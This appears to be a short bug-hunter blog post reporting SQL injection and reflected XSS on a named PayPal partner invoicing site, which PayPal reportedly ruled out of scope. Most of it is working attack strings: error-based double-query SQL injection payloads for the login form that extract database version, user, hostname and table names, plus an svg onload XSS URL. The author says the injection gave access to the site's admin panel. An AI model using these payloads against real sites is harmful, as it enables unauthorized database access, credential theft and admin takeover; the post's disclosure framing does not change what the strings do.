Paypal Partner SQL Injection

One of the Paypal Partner websites http://ppinvoice.com/ was suffering from a POST SQL injection. Union injection was impossible in here.

LoginForm[email]=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3

As we cannot continue with the above error, double query injection works perfect.

LoginForm[email]=1' and(select 1 from(select count(*),concat((select 
(select concat(0x7e,0x27,cast(version() as char), 0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and 1=1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3

LoginForm[email]=1' or 1 GROUP BY concat_ws(' :: ',version(),
user(),database(),@@license,@@hostname,floor(rand(0)*2)) having min(0) or 
1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3

However dumping the database was quite easy since there were no WAFs or any kind of filtering happening. Out of the tables let’s check out the admin table.

LoginForm[email]=1'  or (@:=1)||@ group by concat((select substr
(group_concat(' :: ',table_name),1,450) from information_schema.tables 
WHERE table_schema=database()),@:=@-1)having @||min(@:=0)%23&LoginForm
[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3

So Finally I was able to log into their admin panel 😉

That’s not all there is also a reflected XSS.
http://ppinvoice.com/index.php/faq/faqlist?id=4″><svg/onload=”prompt(‘Hello There’)”>

It states about Cisco too in the Copyright.

However I reported Paypal and they said it’s out of scope. Well, I recently saw another researcher who had found some issues in another Paypal Partner website running SILK software was accepted while mine was not. The issue seems to be in SILK software. It seems like they are a third party to Paypal. They are also a Magento Solution Provider according their webpage.